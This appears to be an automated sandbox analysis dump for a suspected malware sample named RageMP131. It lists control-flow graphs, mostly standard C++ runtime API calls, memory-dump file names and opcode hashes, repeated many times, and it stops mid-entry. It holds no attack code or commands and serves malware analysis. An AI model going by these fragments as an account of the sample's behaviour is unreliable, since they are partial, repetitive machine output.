                                    • Opcode Fuzzy Hash: 663b507beda2cffe576a5847f60736a7b0a06665e6ec4ab492f33c555f2625a8
                                    • Instruction Fuzzy Hash: EC61C171D00909AEDF13DFA8C884EEFBFB9EF19304F168145E810AB25AD771D9019BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 448 2db6b0-2db6cf 449 2db7fc call 272040 448->449 450 2db6d5-2db6e8 448->450 455 2db801 call 271fa0 449->455 451 2db6ea 450->451 452 2db713-2db71b 450->452 454 2db6ec-2db6f1 451->454 456 2db71d-2db722 452->456 457 2db724-2db734 452->457 460 2db6f4-2db6f5 call 34c950 454->460 466 2db806-2db80b call 351e70 455->466 456->454 458 2db736-2db73b 457->458 459 2db743-2db745 457->459 458->455 462 2db741 458->462 463 2db757 459->463 464 2db747-2db755 call 34c950 459->464 469 2db6fa-2db6ff 460->469 462->460 468 2db759-2db77c 463->468 464->468 472 2db77e-2db7a8 call 34e630 call 34ebb0 468->472 473 2db7d3-2db7f9 call 34e630 call 34ebb0 468->473 469->466 474 2db705-2db711 469->474 484 2db7bc-2db7d0 call 34cbd1 472->484 485 2db7aa-2db7b8 472->485 474->468 485->466 487 2db7ba 485->487 487->484
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002DB801
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction ID: 5441e7ef84b5f53079044b1ec15c9aaa8963aaa47863f86671376b015b82f037
                                    • Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction Fuzzy Hash: D8410372910115DBDB06DF68D8916AEB7E9EF84350F16026AE805EB341D730EE2187E1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 489 3621d2-3621e6 call 367d9e 492 3621ec-3621f4 489->492 493 3621e8-3621ea 489->493 495 3621f6-3621fd 492->495 496 3621ff-362202 492->496 494 36223a-36225a call 367d0d 493->494 505 36226c 494->505 506 36225c-36226a call 35a8c8 494->506 495->496 498 36220a-36221e call 367d9e * 2 495->498 499 362204-362208 496->499 500 362220-362230 call 367d9e FindCloseChangeNotification 496->500 498->493 498->500 499->498 499->500 500->493 508 362232-362238 500->508 510 36226e-362271 505->510 506->510 508->494
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003620B9,00000000,CF830579,003A1090,0000000C,00362175,0035627D,?), ref: 00362228
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 46fa794e7f1b66f3074e6762f2e724328908f967b28b7fb149eb7baae32998cd
                                    • Instruction ID: 8c139b415594dd6eae26400f2857295348574caaef5cd25174f9ff5a3b3af328
                                    • Opcode Fuzzy Hash: 46fa794e7f1b66f3074e6762f2e724328908f967b28b7fb149eb7baae32998cd
                                    • Instruction Fuzzy Hash: 7C116633709A1416D6232374AC51B7F2B899F83B38F7B8A19FA189F0DADA719C814191

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 515 35b71c-35b734 call 367d9e 518 35b736-35b73d 515->518 519 35b74a-35b760 SetFilePointerEx 515->519 520 35b744-35b748 518->520 521 35b775-35b77f 519->521 522 35b762-35b773 call 35a8c8 519->522 524 35b79b-35b79e 520->524 521->520 523 35b781-35b796 521->523 522->520 523->524
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,003A0D48,0034BC71,00000002,0034BC71,00000000,?,?,?,0035B826,00000000,?,0034BC71,00000002,003A0D48), ref: 0035B758
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 1dee646cac25e97f0e29b35a4a4faabfbd613e4ea730dbc47fba8450c0b7915a
                                    • Instruction ID: c00142a8d7913edcc30dd0cf721cd6986da41d81d496770015ae8d2aeee4608d
                                    • Opcode Fuzzy Hash: 1dee646cac25e97f0e29b35a4a4faabfbd613e4ea730dbc47fba8450c0b7915a
                                    • Instruction Fuzzy Hash: BB01D632610515AFCF069F59CC45CAE7B69DFC5325B350208FC519B2E1EB71ED419B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 528 34c950-34c953 529 34c962-34c965 call 35b5ec 528->529 531 34c96a-34c96d 529->531 532 34c955-34c960 call 35ee98 531->532 533 34c96f-34c970 531->533 532->529 536 34c971-34c975 532->536 537 271fa0-271ff0 call 271f80 call 34e5bb call 34dd11 536->537 538 34c97b 536->538 538->538
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00271FDE
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
                                    • Instruction ID: d98d723dc47e0134ebda18c26e577aef07dfab764ff735bc4e1a36079e55243a
                                    • Opcode Fuzzy Hash: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
                                    • Instruction Fuzzy Hash: C301D63981030DB7CB26AEA8DC0189977EC9E06360B508525F918AE9A1FB70FA648795
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,0034ADBC,?,?,00363439,00000001,00000364,?,00000006,000000FF,?,0034DD3B,?,?,?,?), ref: 00363AF5
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: c750bf8017a8440f2fcba105e718e8f71c042293705f93d6821e6407323eae9d
                                    • Instruction ID: dc14775edf1bec054ce51f758d773eaf865cf57aeba01b885f6bf55982c7d714
                                    • Opcode Fuzzy Hash: c750bf8017a8440f2fcba105e718e8f71c042293705f93d6821e6407323eae9d
                                    • Instruction Fuzzy Hash: EBF0E93160962566DB236E66CC05F9B3B4CDF42760B1AC111EC449B09CCB20DE0092E4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0034DD3B,?,?,?,?,?,00272D8D,0034ADBC,?,?,0034ADBC), ref: 00364520
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 710610e12a28bced419036bdd5c9ea798be86bdd3b949a5fed3bc52c90906f9a
                                    • Instruction ID: 95653bed5afe871f42421120608d463c5daa11f749706780e3de4e9efc5981d5
                                    • Opcode Fuzzy Hash: 710610e12a28bced419036bdd5c9ea798be86bdd3b949a5fed3bc52c90906f9a
                                    • Instruction Fuzzy Hash: 07E09231A0172167EA233A659C01BAB3A8DDF437B1F1A9121EF469B0D9EB50CD0081EA
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAB43
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAB65
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAB85
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DABAF
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAC1D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAC69
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAC83
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAD18
                                    • std::_Facet_Register.LIBCPMT ref: 002DAD25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
                                    • Instruction ID: 3596b0245ef26a5c75a393d1082aa96313cfb37a85fa86b7fecedc98bd6001d1
                                    • Opcode Fuzzy Hash: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
                                    • Instruction Fuzzy Hash: 28617BB1D102499FDF12DFA4D845B9EBBF8AF15314F18405AE804AB391EB34ED05CBA2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
                                    • __Getctype.LIBCPMT ref: 0027384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:'$bad locale name
                                    • API String ID: 1840309910-3347340704
                                    • Opcode ID: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
                                    • Instruction ID: 39b3ddf4b4fd8f74d36719129aff16b12dd018d0dc17708b1b374270bc8143ed
                                    • Opcode Fuzzy Hash: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
                                    • Instruction Fuzzy Hash: 94515FB1D103499BDF11DFA4D846B9EFBB8AF14310F148169EC08AF241E775EA18DB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00350507
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0035050F
                                    • _ValidateLocalCookies.LIBCMT ref: 00350598
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003505C3
                                    • _ValidateLocalCookies.LIBCMT ref: 00350618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction ID: 8e7dc35871e5cd49398ed5b4bcbe384538ad416425dfcdef370e543c350bf461
                                    • Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction Fuzzy Hash: 2341C430A04208ABCF16DF69C880E9E7BB4AF45325F148455FC18AB362E732DA59CF90
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9263
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9286
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D92A6
                                    • std::_Facet_Register.LIBCPMT ref: 002D931B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D9333
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002D934B
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
                                    • Instruction ID: 11146d8bd908ba573ada78268ac825660b1f38d7ed96bce9c95b33023ee7288a
                                    • Opcode Fuzzy Hash: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
                                    • Instruction Fuzzy Hash: 5941CF71910215AFCF16DF58D885BAEBBB8FF42310F14425AE8046B391D730AD95CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00276248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 002761CC
                                    Memory Dump Source
